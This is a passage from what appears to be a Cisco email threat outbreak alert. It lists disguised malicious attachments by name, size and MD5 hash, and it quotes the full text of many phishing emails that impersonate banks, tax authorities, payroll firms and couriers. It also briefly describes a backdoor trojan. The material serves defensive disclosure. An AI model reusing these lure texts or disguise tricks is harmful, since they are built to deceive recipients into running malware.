_Jackgreen-Energy-Transaction-Receipt.zip_ attachment has a file size of 79,360 bytes. The MD5 checksum is the following string: 0x3ECD84642221E4F168D25D617070587E \n \nThe _EuropCar Invoice.pdf.exe_ file in the _EuropCar Invoice.zip_ attachment has a file size of 42,496 bytes. The MD5 checksum is the following string: 0xBAFEBF4CDF640520E6266EB05B55D7C5 \n \nThe _ACH_Report-673D6535C46E.pdf.scr_ file in the _ACH_Report-673D6535C46E.zip_ attachment has a file size of 287,232 bytes. The MD5 checksum is the following string: 0x2F7C5A0523FBB42CC65BDFC77B98DCF7 \n \nThe _invoiceJVQ9A8VIZ52LYZ3R66.JPG.exe_ has a file size of 153,600 bytes. The MD5 checksum is the following string: 0xB612EEB950838BA361CC62BEA5A24F9C \n \nThe _Geico - SSNYDER@GEICO.COM.pdf.exe_ file in the _Geico - SSNYDER@GEICO.COM.pdf.zip_ attachment has a file size of 225,629 bytes. The MD5 checksum is the following string: 0xC0A31B16127A8E33B5FD45815EDA3932 \n \nThe _E-FATURA-76497321988.pdf.exe _file in the _E-FATURA-9407544438.pdf.zip_ attachment has a file size of 44,544 bytes. The MD5 checksum is the following string: 0xAFFB6C0F4D0B82661BCE8D1CF5AED764 \n \nThe _D_1964691LawndaleESD.xls.exe _file has a file size of 165,420 bytes. The MD5 checksum is the following string: 0x92DD1FE49B387EDA6AE3AD56BF69143D \n \nThe _report_pdf.exe_ file has a file size of 336,384 bytes. The MD5 checksum is the following string: 0xFFF8DF8949EED7E6C6D22B9768F4BEE9 \n \nA third variant of _report.pdf.exe_ has a file size of 311,808 bytes. The MD5 checksum is the following string: 0xE99352FC1F58E2B583A7405217573FE1 \n \nA fourth variant of _report.pdf.exe_ file size is unavailable. The MD5 checksum is also unavailable. \n \nThe _Tax.Refund.Confidential.Message.html.exe_ file in the _Tax.Refund.Confidential.Message.zip_ attachment has a file size of 42,343 bytes. The MD5 checksum is the following string: 0x94494659945B843E58F987F62160724B \n \nThe _Tax.Refund.Confidential.Message.PDF.exe_ file in the _Tax.Refund.Confidential.Message.zip_ attachment has a file size of 34,820 bytes. The MD5 checksum is the following string: 0xA3DF20E1A746D58C5482FD554851B714 \n \nThe _AWB-Avis 240-11980057.pdf.exe_ file in the _AWB-Avis 768-38251502.pdf.zip _attachment has a file size of 30,724 bytes. The MD5 checksum is the following string: 0xCE02B23B408B4D155F654B3141CA7392 \n \nThe _ADP TotalSource Payroll Invoice ID-EF2342AC2357-AA-43345435345345234234234356456.pdf.exe_ file in the _ADP-TotalSource-Payroll-Invoice-01B10F09552A.zip_ attachment has a file size of 115,712 bytes. The MD5 checksum is the following string: 0x0A2C21B865E83500335C98FF6106811F \n \nThe _ADP TotalSource Payroll Invoice #-85703433498405-3421487568567-74-0582134097475657-62243857824758473275237470514376534 \n8653456893473686525456.pdf.exe_ file in the _ADP-TotalSource-Payroll-Invoice-3D8C226BEC.zip_ attachment has a file size of 167,936 bytes. The MD5 checksum is the following string: 0x7EF60CCDB03538D0C737ADA55C87E19D \n \nThe _AWB-Avis 455-74906491.pdf.exe_ file in the _AWB-Avis 432-85560399.pdf.zip_ attachment has an approximate file size of 46,596 bytes. The MD5 checksum is the following string: 0x2820E5E5DAE4C1CB1723462D45BF8867 \n \nThe _Wire_Transfr_Cancel_N9923902.doc.exe_ file in the _Rejected_Transfer.zip_ attachment has a file size of 102,400 bytes. The MD5 checksum is the following string: 0x5BDD0D5180EFC938750D957CE91EDE62 \n \nThe _fedach_rprt_0307131053.PDF.exe_ file in the _fedach_rprt_03072013-0136.zip_ attachment has a file size of 343,552 bytes. The MD5 checksum is the following string: 0xE6BA6C6909995C8F3522E3232FFB9FB0 \n \nThe _Account-Statement-ll9305602.pdf.exe_ file in the _Account-Statement-ll1054070.zip_ attachment has a file size of 30,724 bytes. The MD5 checksum is the following string: 0xB6906BA33EB2FEFDC01C4B40917CF746 \n \nThe _AUSPOST Track Advice Notification.pdf.exe_ file in the _AUSPOST Track Advice Notification.pdf.zip_ attachment has a file size of 46,457 bytes. The MD5 checksum is the following string: 0x617C6359BB1D0937086A10A8BFC38E37 \n \nThe _TGP-Account-Details.doc.exe_ file in the _8089-TGP-Account-Details.zip_ attachment has file size and MD5 checksum unavailable. \n \nThe _Ravenswood_req1rev.xls.exe_ attachment has a file size of 571,436 bytes. The MD5 checksum is the following string: 0xD8ADF45AD17D90C839C8E4D9CC326740 \n \nThe _2711-payslip.pdf.exe_ file in the _9465-payslip.pdf.zip _attachment has no file size and MD5 available. \n \nThe _Order Details - Western Union.doc.exe_ file in the _Order Details - Western Union Online FX.zip_ attachment has a file size of 45,060 bytes. The MD5 checksum is the following string: 0x28413055977F31B1A0FC7E99DF71BED7 \n \nThe _Die Einzelheiten Ihres Einkaufs.pdf.exe_ file in the _Die Einzelheiten Ihres Einkaufs.zip_ attachment has an approximate file size of 34,918 bytes. The MD5 checksum is not available. \n \nThe _Auftragsbestaetigung_659022.pdf.exe_ file in the _Auftragsbestaetigung_155756.zip_ attachment has a file size of 95,232 bytes. The MD5 checksum is the following string: 0xCD84490434F11448FDCA1EBFFA083E14 \n \nThe _report0107446.PDF.exe_ file has a file size of 125,952 bytes. The MD5 checksum is the following string: 0xE4463B69D27B0B91F5B1C13F141EFF02 \n \nThe _report0975346.PDF.exe_ attachment has a file size of 127,488 bytes. The MD5 checksum is the following string: 0xEA44177B806F154F32E0CE5D575C06BA \n \nThe _Ihre Reservierung 987127600.pdf.exe_ file in the _Ihre Reservierung 872769489.zip_ attachment has a file size of 44,312 bytes. The MD5 checksum is the following string: 0x5F7649B9DF358814B19E09EDD5F56D87 \n \nThe _bankcopy.jpg.scr_ file has a file size of 1,718,578 bytes. The MD5 checksum is the following string: 0xCBDE4297FD65DA09A0894A8003E079A3 \n \nThe _report0108696.PDF.exe_ file has a file size of 113,664 bytes. The MD5 checksum is the following string: 0x77306665A6D33AEA465DD9D54F6755BC \n \nThe _report0108136.PDF.exe _attachment has a file size of 143,360 bytes. The MD5 checksum is the following string: 0x755BC9B33488B11E627CA270476B3AF6 \n \nThe _Bill transactions 74658374639.pdf.exe_ file in the _Bill transactions 695936805.zip_ attachment has a file size of 23,552 bytes. The MD5 checksum is the following string: 0xACA4439DF5CEB9F7AE3E5DB79C0C447B \n \nThe _WellsFargo_0715201.PDF.exe_ file in the _DOC_alan.zip_ attachment has a file size of 116,736 bytes. The MD5 checksum is the following string: 0xE9B12C2C4958484A142BC5373221A8AE \n \nThe _Scan_Report.xls.scr_ file in the _File-Report.zip_ attachment has a file size of 247,560 bytes. The MD5 checksum is the following string: 0xCB5835830764E64029080A2C7B4C5B30 \n \nThe _auguri.jpg.exe_ file has a file size of 348,160 bytes. The MD5 checksum is the following string: 0xDCA77F0A80858853CA801B971304BC15 \n \nThe _payment.pdf.exe_ file in the _payment.pdf.zip_ attachment has a file size of 1,131,044 bytes. The MD5 checksum is the following string: 0xB51E4CB2547AD5CD596FF3C347112681 \n \nA fifth variant of the _report.pdf.exe_ file in the_ report.pdf.zip _attachment has a file size of 177,152 bytes. The MD5 checksum is the following string: 0x452C1BEBA320DA19DE1106D721AC09BD \n \nA sixth variant of the _report.pdf.exe_ file in the _report.pdf.zip_ attachment has a file size of 170,496 bytes. The MD5 checksum is the following string: 0x9F63944CE6CD0BF53FEF15C2587BC583 \n \nThe _2013_Federal_Tax_Return.pdf.exe_ file in the _2013_Federal_Tax_Return.pdf.zip_ attachment has a file size of 262,656 bytes. The MD5 checksum is the following string: 0x2F51354042ABAA6474AB6196285D4416 \n \nThe _payment slip.pdf.scr_ file in the _payment slip.pdf.zip_ attachment has a file size of 1,229,086 bytes. The MD5 checksum is the following string: 0x6B5B04C9811B48668BA939DAEF705138 \n \nThe _WU INFORMATION REF # 623-724-5013.jpeg.scr_ file in the _WU INFORMATION REF # 623-724-5013.jpeg.zip_ attachment has a file size of 1,056,768 bytes. The MD5 checksum is the following string: 0x2B00A0536EC190FD6F22F894AFB4BA61 \n \nThe _Payment.txt.exe_ file in the _Payment.zip_ attachment has a file size of 348,160 bytes. The MD5 checksum is the following string: 0xAF02AC846B74023039695562DA3769DC \n \nThe _JWS-2via-boleto-Abril-2014-PDF.cpl_ in the _JWS-Boleto-Assessoria-Juridica.PDF.zip _file has a file size of 599,040 bytes.The MD5 checksum is the following string: 0x259E520E493F799AB4DE6270D262FB13 \n \nThe following text is a sample of the e-mail message that is associated with this threat outbreak: \n\n> Subject: **Canceled transaction** \n \nMessage Body: \n \n**NANCHA \nThe Electronic Payments Association \nCanceled Transfer \nTransfer id: 564790786736534767 \nReason for rejection View details in the report below \nTransfer report report 564790786736534767.pdf \n13450 Sunrise Vallay Drive, Suite 100 Herndon VA20171(703) 561-1100 \n2011 NACHA-The Eleactronic Payment Association**\n\nOr \n\n> Message Body: \n \n**Order Number: M1V5617911 \nReceipt Date: 05/28/12 \nOrder Total: $699.99 \nBilled To: Credit card \nItem Number Description Unit Price \n1 \nPostcard (View\\Download ) \nCancel order Not your order? Report a Problem \n$699.99 \nSubtotal: $699.99 \nTax: $0.00 \nOrder Total: $699.99 \n \nPlease retain for your records. \nPlease See Below For Terms And Conditions Pertaining To This Order. Apple Inc. \nYou can find the iTunes Store Terms of Sale and Sales Policies by launching your iTunes application and clicking on Terms of Sale or Sales Policies \nFBI ANTI-PIRACY WARNING \nUNAUTHORIZED COPYING IS PUNISHABLE UNDER FEDERAL LAW. \nAnswers to frequently asked questions regarding the iTunes Store can be found at hxxp:// \nApple ID Summary EE Detailed invoice \nApple respects your privacy. \nCopyright 2011 Apple Inc. All rights reserved**\n\nOr \n\n> Subject: **Important Business Banking Alert** \n \nMessage Body: \n \n**Chase \nAt Chase, we're committed to providing the tools you need to help you monitor your account(s). Below is a list of the latest transactions for the accounts in your profile: \n*We've started to process a(n) ($ USD) 7,996.00 ACH Payment (transaction #3097559175) from account to Avnet on Tue, 30 Oct 2012 21:27:33 +0530. \nIf you have questions about the transaction(s) or this alert, please open attached PDF file and find number of Your case and full data. \nPlease do not reply to this Automatic Alert. Instead, You can find all necessary contacts in attached file. \nWe appreciate your business. \nSincerely, \nOnline Business Banking Team **\n\nOr \n\n> Subject: **Dcompte des sommes restant dues!!!** \n \nMessage Body: \n \n**Nantes le 18 novembre 2012 \nMonsieur,Madame \nJe vous prie de trouver en lien ci-dessous fichier pdf votre d\u00e9compte des sommes restant dues \u00e0 la DGI dans le dossier cit\u00e9 en r\u00e9f\u00e9rences. \nDossier DGI Impots Recouvrement N\u00b0 175018192456 \nJe compte que \u00e7e dossier soit r\u00e9gl\u00e9 en totalit\u00e9 fin novembre 2012 dernier d\u00e9lai! \nVous en souhaitant bonne r\u00e9ception, \nSinc\u00e8res salutations. \nPO/ Dossier DGI Impots Recouvrement N\u00a8\u00b0 175018192456 \nAlexandre Marais \nHuissier de Justice \n3 Rue des Bosquets \nTel:. 0 892 163 544 alexandre.leroux.huissier@orange.fr BP667 \n44100 - NANTES Cedex **\n\nOr \n\n> Subject: **Fwd: UK Payments transaction failed** \n \nMessage Body: \n \n**Transfer id: 415914 \nReason for rejection: View details in the report below \nTransfer report: http://www.ukpayments.org.uk/Wi6U0RO/report_pdf.php \n2 Thomas More Square, London, E1W 1YN, Tel: 020 3217 8200 Fax: 020 7488 6959 \n2012 UK Payments Administration Ltd**\n\nOr \n\n> Subject: **Transaction Receipt** \n \nMessage Body: \n \n**3D\"\" \n= \nJackgreen Energy \nSydney, NSW, Australia \nwww.jackgreen.com.au \n1300 46 5225 \nClient Reference/Invoice Number: 0673386867= \nPlease refer to attaceh= d file for full Transaction Receipt Details \nPlease keep these details on record for reconciliation purpose= s**\n\nOr \n\n> Subject: **Your Amazon purchase receipt.** \n \nMessage Body: \n \n**Transaction ID: 4589953 \nHello, \nYou sent a payment of $5526 USD to Thaddeus Voliva \nThanks for using PayPal. To see all the transaction details, Download report (Self extracting archive). \nPlease do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.**\n\nOr \n\n> Subject: **Telephone problems** \n \nMessage Body: \n \n**WarningID: #9111562 \nYour telephone will be turned off in two days. \nYou can watch description in pdf file (Self extracting archive).**\n\nOr \n\n> Subject: **Tax Refund New Message Alert!** \n \nMessage Body: \n \n**TAX RETURN FOR THE YEAR 2013 \nRECALCULATION OF YOUR TAX REFUND \nHMRC 2010-2011 \nDear Applicant, \nThe contents of this email and any attachments are confidential \nand as \napplicable, copyright in these is reserved to HM Revenue & \nCustoms. \nUnless expressly authorised by us, any further dissemination or \ndistribution of this email or its attachments is prohibited. \nIf you are not the intended recipient of this email, please reply \nto \ninform us that you have received this email in error and then \ndelete it \nwithout retaining any copy. \nI am sending this email to announce: After the last annual \ncalculation of \nyour fiscal activity we have determined that you are eligible to \nreceive a \ntax refund of 000.45 GBP \nYou have attached the tax return form with the TAX REFUND NUMBER \nID: 111404663, \ncomplete the tax return form attached to this message. \nAfter completing the form, please submit the form by clicking the \nSUBMIT \nbutton on form and allow us 5-9 business days in order to process \nit. \nOur head office address can be found on our web site at HM \nRevenue & Customs: http://www.hmrc.gov.uk \nSincerely, \nHMRC Tax Credit Office \nCopyright 2013, HM Revenue & Customs UK All rights reserved. **\n\nOr \n\n> Subject: **Tax Refund New Message Alert!** \n \nMessage Body: \n \n**TAX RETURN FOR THE YEAR 2013 \nRECALCULATION OF YOUR TAX REFUND \nHMRC 2010-2011 \nDear Applicant, \nThe contents of this email and any attachments are confidential \nand as \napplicable, copyright in these is reserved to HM Revenue & \nCustoms. \nUnless expressly authorised by us, any further dissemination or \ndistribution of this email or its attachments is prohibited. \nIf you are not the intended recipient of this email, please reply \nto \ninform us that you have received this email in error and then \ndelete it \nwithout retaining any copy. \nI am sending this email to announce: After the last annual \ncalculation of \nyour fiscal activity we have determined that you are eligible to \nreceive a \ntax refund of 429.18 GBP \nYou have attached the tax return form with the TAX REFUND NUMBER \nID: 840960093, \ncomplete the tax return form attached to this message. \nAfter completing the form, please submit the form by clicking the \nSUBMIT \nbutton on form and allow us 5-9 business days in order to process \nit. \nOur head office address can be found on our web site at HM \nRevenue & Customs: hxxp://www.hmrc.gov.uk \nSincerely, \nHMRC Tax Credit Office \nCopyright 2013, HM Revenue & Customs UK All rights reserved.**\n\nOr \n\n> Subject: **Luftfrachsendung AWB** \n \nMessage Body: \n \n**Hallo, \nanbei der AWB bitte best\u00e4tigen ob alles Ok ist. \nDanke \nMit freundlichen Gr\u00fc\u00dfen \nFirst Class Zollservice & \nTransportvermittlungs GmbH \nNiederlassungsleiter \nNordendstra\u00dfe. 32 B \n64546 M\u00f6rfelden Walldorf \nTel.: 06105 / 40352 11 \nFax: 06105 / 40352 20 \nwww.first-class-zollservice.de \nSchulungen im Bereich Luftsicherheit - ONLINE 3+1 Std. Schulung gem\u00e4\u00df 185/2010 Kap. 11.2.3.9 / \nSchulungen im Bereich Zoll- und Au\u00dfenwirtschaft \nWir arbeiten ausschlie\u00dflich auf Grundlage der Allgemeinen Deutschen Spediteurbedingungen (ADSp), jeweils neueste Fassung. \nDiese beschr\u00e4nken in Ziffer 23 ADSp die gesetzliche Haftung f\u00fcr G\u00fctersch\u00e4den nach 431 HGB f\u00fcr Sch\u00e4den im speditionellen \nGewahrsam auf EUR 5,- je Kg. Bei multimodalen Transporten unter Einschluss einer Seebef\u00f6rderung auf 2 Sonderziehungsrechte \nje Kg sowie dar\u00fcber hinaus je Schadenfall bzw. - ereignis auf EUR 1,0 bzw. 2,0 Mio. oder 2 Sonderziehungsrechte /kg, je nach dem, \nwelcher Betrag h\u00f6her ist.**\n\nOr \n\n> Subject: **ADP TotalSource Automated Payroll Invoice Notification** \n \nMessage Body: \n \n**ADP TotalSource \nA copy of your ADP TotalSource Payroll Invoice for the following payroll is is attached in PDF file and available for viewing. \nYear: 13 \nWeek No: 08 \nPayroll No: 1 \nPlease open attached file to view and check following payrol \nThis email was generated by an automated notification system. If you have any questions regarding the invoice or you have misplaced your \nMyTotalSource login information, please contact your Payroll Service Representative. Please do not reply to the email directly. \n\u00a9 2007 Automatic Data Processing, Inc. **\n\nOr \n\n> Subject: **ADP TotalSource Automated Payroll Invoice Notification** \n \nMessage Body: \n \n**ADP TotalSource \nA copy of your ADP TotalSource Payroll Invoice for the following payroll is is attached in PDF file and available for viewing. \nYear: 13 \nWeek No: 08 \nPayroll No: 1 \nPlease open attached file to view and check following payrol \nThis email was generated by an automated notification system. If you have any questions regarding the invoice or you have misplaced your \nMyTotalSource login information, please contact your Payroll Service Representative. Please do not reply to the email directly. \n\u00a9 2007 Automatic Data Processing, Inc.**\n\nOr \n\n> Subject: **Fwd: Re: Wire Transfer Confirmation** \n \nMessage Body: \n \n**Dear Bank Operator, \nSTATUS: REJECTED \nWIRE TRANSFER: FEDW-5693886002484 \nYou can find details in the attached file.**\n\nOr \n\n> Subject: **FedMail (R): FEDACH Notice - End of Day - 03/4/13** \n \nMessage Body: \n \n**Please take a look at attached ACH Notification Records from the Federal Reserve Banking System **\n\nOr \n\n> Subject: **Track Advice Notification : Consignment RYR8226512** \n \nMessage Body: \n \n**Dear Customer, \nYour parcel (1) has been despatched with Australia Post. \nYou will receive email notifications relating to the arrival of the product to the delivery address. \nPlease open attached file for more details. \nRegards, \n**Please note that this is an automatically generated email - replies will not be answered.**\n\nOr \n\n> Subject: **International Wire Transfer File Not Processed** \n \nMessage Body: \n \n**We are unable to process your International Wire Transfer request due to insufficient funds in the identified account. \nReview the information below and contact your Relationship Manager if you have questions, or make immediate arrangements to fund the account. If funds are not received by 04/12/2013 03:00 pm PT, the file may not be processed. \nPlease view the attached file for more details on this transaction. \nAny email address changes specific to the Wire Transfer Service should be directed to Treasury Management Client Services at 1-800-AT-WELLS (1-800-289-3557). \nEvent Message ID: S941-6828257 Date/Time Stamp: Fri, 12 Apr 2013 19:16:42 +0330 \n\\--------------------------------------------------------------------------- ------------------------------------------------------------------------- \nPlease do not reply to this email; this mailbox is only for delivery of Event Messaging notices. To ensure you receive these notices, add ofsrep.ceoemigw@wellsfargo.com to your address book. \nFor issues related to the receipt of this message, call toll free 1-800-AT-WELLS (1-800-289-3557) Monday through Friday between 4:00 am and 7:00 pm and Saturday between 6:00 am and 4:00 pm Pacific Time. \nCustomers outside the U.S. and Canada may contact their local representative's office, or place a collect call to Treasury Management Client Services at 1-704-547-0145. \nPlease have the Event Message ID available when you call. **\n\nOr \n\n> Subject: **Pay by Phone Parking Receipt** \n \nMessage Body: \n \n**Westminster Pay by Phone Parking Receipt \nLocation: 6536 \nLicense: A35LHVQ \nDescription: Ebury Bridge Rd \nStart Parking: 2013/05/15 11:20pm \nStop Parking: 2013/05/15 01:20pm \nCost: 24.10 including Service Charge \nYou can access a full list of all your parking transactions in the attached file \nThank you for using Westminster City Council's Pay by Phone parking \nservice**\n\nOr \n\n> Subject: **IMPORTANT Documents - WellsFargo** \n \nMessage Body: \n \n**Please review attached files. \nLorena_Witt \nWells Fargo Advisors \n817-119-6493 office \n817-821-2848 cell \nLorena_Witt@wellsfargo.com \nInvestments in securities and insurance products are: \nNOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE \nWells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 \nCONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.**\n\nOr \n\n> Message Body: \n \n**Greetings, \nkindly find attached feedback file - Deposits \nThanks and Regards, \nANTHONY FRANCIS GODINHO \nHatton National Bank PLC - HEAD OFFICE \n\u201cWe give you more money for your money\u201d \nP.O. Box 10072, Dubai, United Arab Emirates \nTel +9714 4520166 Fax +9714 4923269 \nChinthaka.Wedage@hnb.lk \nwww.hnb.lk**\n\nOr \n\n> Subject: **Late 2013 Tax Return Processing!** \n \nMessage Body: \n \n**Dear Customer \nPlease review the report on your late 2013 tax refund and get back to us with the details for the processing. \nThanks \nInternal Revenue Service \n915 Second Avenue, MS W180 \nSeattle, WA 98174-0041 \n(206) 220-6011 \nhxxp: //www.irs.gov/**\n\nOr\n\n> Subject: **WU INFORMATION REF # 623-724-5013** \n \nMessage Body: \n \n**Transfer of money via walmart Wu Ref # 623-724-5013 ,Linda A Rickety 6123 Sharlene drive Cincinnati OH 45248 ,in amount to receiver information .Receipt has been enclose to the mail for confirmation. \nBest regards, \nGupta Bradley**\n\nMalicious software installed by files that are distributed using these messages may be related to the _Trojan.Win32.Generic.pak!cobra_ family, which can download a malicious file from the Internet and create a start-up registry entry. The trojan may open a back door on the infected system to communicate with a remote attacker. Additionally, the malicious code may attempt to modify the system registry and files. \n \nCisco Security analysts examine real-world email traffic data that is collected from over 100,000 contributing organizations worldwide. This data helps provide a range of information about and analysis of global email security threats and trends. Cisco will continue to monitor this threat and automatically adapt systems to protect customers. This report will be updated if there are significant changes or if the risk to end users increases. \n \nCisco security appliances protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Email that is managed by Cisco and end users who are protected by Cisco Web Security Appliances will not be impacted by these attacks. Cisco security appliances are automatically updated to prevent both spam email and hostile web URLs from being passed to the end user. \n \n**Related Links** \n[Cisco Security](<http://www.cisco.com/security>) \n[Cisco SenderBase Security Network](<http://www.senderbase.org/>)\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n80 | Cisco Security has detected significant activity on April 8, 2014. | | 2014-April-10 13:53 GMT \n79 | Cisco Security has detected significant activity on October 28, 2013. | | 2013-October-29 13:25 GMT \n78 | Cisco Security has detected significant activity on October 13, 2013. \n \n| | 2013-October-14 19:20 GMT \n77 | Cisco Security has detected significant activity on October 6, 2013. \n \n| | 2013-October-07 14:19 GMT \n76 | Cisco Security has detected significant activity on September 24, 2013. \n \n| | 2013-September-26 13:20 GMT \n75 | Cisco Security has detected significant activity on September 10, 2013. \n \n| | 2013-September-11 18:29 GMT \n74 | Cisco Security has detected significant activity on September 4, 2013. \n \n| | 2013-September-05 14:21 GMT \n73 | Cisco Security has detected significant activity on September 3, 2013. \n \n| | 2013-September-04 12:09 GMT \n72 | Cisco Security has detected significant activity on August 17, 2013. \n \n| | 2013-August-19 14:06 GMT \n71 | Cisco Security has detected significant activity on July 15, 2013. \n \n| | 2013-July-15 19:31 GMT \n70 | Cisco Security has detected significant activity on June 7, 2013. \n \n| | 2013-June-07 17:07 GMT \n69 | Cisco Security has detected significant activity on May 30, 2013. \n \n| | 2013-May-31 13:45 GMT \n68 | Cisco Security has detected significant activity on May 29, 2013. \n \n| | 2013-May-30 19:33 GMT \n67 | Cisco Security has detected significant activity on May 29, 2013. \n \n| | 2013-May-29 16:54 GMT \n66 | Cisco Security has detected significant activity on May 28, 2013. \n \n| | 2013-May-28 14:46 GMT \n65 | Cisco Security has detected significant activity on May 24, 2013. \n \n| | 2013-May-24 19:33 GMT \n64 | Cisco Security has detected significant activity on May 21, 2013. \n \n| | 2013-May-21 13:51 GMT \n63 | Cisco Security has detected significant activity on April 8, 2013. \n \n| | 2013-April-08 16:54 GMT \n62 | Cisco Security has detected significant activity on March 20, 2013. \n \n| | 2013-March-21 15:43 GMT \n61 | Cisco Security has detected significant activity on March 20, 2013. \n \n| | 2013-March-20 14:15 GMT \n60 | Cisco Security has detected significant activity on March 14, 2013. \n \n| | 2013-March-15 22:34 GMT \n59 | Cisco Security has detected significant activity on March 13, 2013. \n \n| | 2013-March-14 16:08 GMT \n58 | Cisco Security has detected significant activity on March 11, 2013. \n \n| | 2013-March-12 16:58 GMT \n57 | Cisco Security has detected significant activity on March 10, 2013. \n \n| | 2013-March-11 16:01 GMT \n56 | Cisco Security has detected significant activity on March 8, 2013. \n \n| | 2013-March-08 21:57 GMT \n55 | Cisco Security has detected significant activity on March 7, 2013. \n \n| | 2013-March-07 20:38 GMT \n54 | Cisco Security has detected significant activity on March 5, 2013. \n \n| | 2013-March-05 17:38 GMT \n53 | Cisco Security has detected significant activity on March 4, 2013. \n \n| | 2013-March-04 21:47 GMT \n52 | Cisco Security has detected significant activity on March 4, 2013. \n \n| | 2013-March-04 16:20 GMT \n51 | Cisco Security has detected significant activity on February 25, 2013. \n \n| | 2013-February-25 16:43 GMT \n50 | Cisco Security has detected significant activity on February 21, 2013. \n \n| | 2013-February-22 15:50 GMT \n49 | Cisco Security has detected significant activity on February 20, 2013. \n \n| | 2013-February-21 17:21 GMT \n48 | Cisco Security has detected significant activity on January 25, 2013. \n \n| | 2013-January-28 17:18 GMT \n47 | Cisco Security has detected significant activity on January 25, 2013. \n \n| | 2013-January-25 15:37 GMT \n46 | Cisco Security has detected significant activity on January 22, 2013. \n \n| | 2013-January-23 14:59 GMT \n45 | Cisco Security has detected significant activity on January 21, 2013. \n \n| | 2013-January-22 17:24 GMT \n44 | Cisco Security has detected significant activity on January 16, 2013. \n \n| | 2013-January-16 16:55 GMT \n43 | Cisco Security has detected significant activity on December 16, 2012. \n \n| | 2012-December-17 16:09 GMT \n42 | Cisco Security has detected significant activity on December 10, 2012. \n \n| | 2012-December-11 15:15 GMT \n41 | Cisco Security has detected significant activity on December 5, 2012. \n \n| | 2012-December-05 16:13 GMT \n40 | Cisco Security has detected significant activity on November 27, 2012. \n \n| | 2012-November-27 18:10 GMT \n39 | Cisco Security has detected significant activity on November 19, 2012. \n \n| | 2012-November-20 16:02 GMT \n38 | Cisco Security has detected significant activity on November 19, 2012. \n \n| | 2012-November-19 18:12 GMT \n37 | Cisco Security has detected significant activity on October 30, 2012. \n \n| | 2012-October-30 20:42 GMT \n36 | Cisco Security has detected significant activity on October 11, 2012. \n \n| | 2012-October-15 13:50 GMT \n35 | Cisco Security has detected significant activity on August 9, 2012. \n \n| | 2012-August-10 19:51 GMT \n34 | Cisco Security has detected significant activity on August 6, 2012. \n \n| | 2012-August-07 16:43 GMT \n33 | Cisco Security has detected significant activity on July 26, 2012. \n \n| | 2012-July-27 14:25 GMT \n32 | Cisco Security has detected significant activity on July 26, 2012. \n \n| | 2012-July-26 18:32 GMT \n31 | Cisco Security has detected significant activity on July 9, 2012. \n \n| | 2012-July-10 14:33 GMT \n30 | Cisco Security has detected significant activity on May 31, 2012. \n \n| | 2012-June-01 14:45 GMT \n29 | Cisco Security has detected significant activity on May 30, 2012. \n \n| | 2012-May-30 21:16 GMT \n28 | Cisco Security has detected significant activity on May 17, 2012. \n \n| | 2012-May-18 14:37 GMT \n27 | Cisco Security has detected significant activity on March 23, 2012. \n \n| | 2012-March-26 14:07 GMT \n26 | Cisco Security has detected significant activity on March 16, 2012. \n \n| | 2012-March-16 19:11 GMT \n25 | Cisco Security has detected significant activity on February 21, 2012. \n \n| | 2012-February-22 15:31 GMT \n24 | Cisco Security has detected significant activity on December 14, 2011. \n \n| | 2012-February-15 20:25 GMT \n23 | Cisco Security has detected significant activity on November 25, 2011 \n \n| | 2011-December-14 17:08 GMT \n22 | Cisco Security has detected significant activity on November 25, 2011. \n \n| | 2011-November-28 17:06 GMT \n21 | Cisco Security has detected significant activity on November 22, 2011. \n \n| | 2011-November-23 12:32 GMT \n20 | Cisco Security has detected significant activity on November 21, 2011. \n \n| | 2011-November-22 14:38 GMT \n19 | Cisco Security has detected significant activity on November 15, 2011. \n \n| | 2011-November-15 23:11 GMT \n18 | Cisco Security has detected significant activity on November 14, 2011. \n \n| | 2011-November-14 14:54 GMT \n17 | Cisco Security has detected significant activity on October 12, 2011. \n \n| | 2011-October-13 18:03 GMT \n16 | Cisco Security has detected significant activity on October 12, 2011. \n \n| | 2011-October-12 18:37 GMT \n15 | Cisco Security has detected significant activity on October 5, 2011. \n \n| | 2011-October-05 13:47 GMT \n14 | Cisco Security has detected significant activity on September 28, 2011. \n \n| | 2011-September-28 16:03 GMT \n13 | Cisco Security has detected significant activity on September 23, 2011. \n \n| | 2011-September-26 20:09 GMT \n12 | Cisco Security has detected significant activity on September 22, 2011. \n \n| | 2011-September-23 18:20 GMT \n11 | Cisco Security has detected significant activity on September 20, 2011. \n \n| | 2011-September-20 12:54 GMT \n10 | Cisco Security has detected significant activity on September 16, 2011. \n \n| | 2011-September-16 13:50 GMT \n9 | Cisco Security has detected significant activity on September 15, 2011. \n \n| | 2011-September-15 13:11 GMT \n8 | Cisco Security has detected significant activity on September 14, 2011. \n \n| | 2011-September-14 14:15 GMT \n7 | Cisco Security has detected significant activity on September 7, 2011. \n \n| | 2011-September-07 17:40 GMT \n6 | Cisco Security has detected significant activity on August 26, 2011. \n \n| | 2011-August-26 14:08 GMT \n5 | Cisco Security has detected significant activity on August 24, 2011. \n \n| | 2011-August-24 15:09 GMT \n4 | Cisco Security has detected significant activity on August 16, 2011. \n \n| | 2011-August-16 19:52 GMT \n3 | Cisco Security has detected significant activity on August 16, 2011. \n \n| | 2011-August-16 12:51 GMT \n2 | Cisco Security has detected significant activity on August 16, 2011. \n \n| | 2011-July-27 13:18 GMT \n1 | Cisco Security has detected significant activity on June 28, 2011. | | 2011-June-29 14:00 GMT \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack 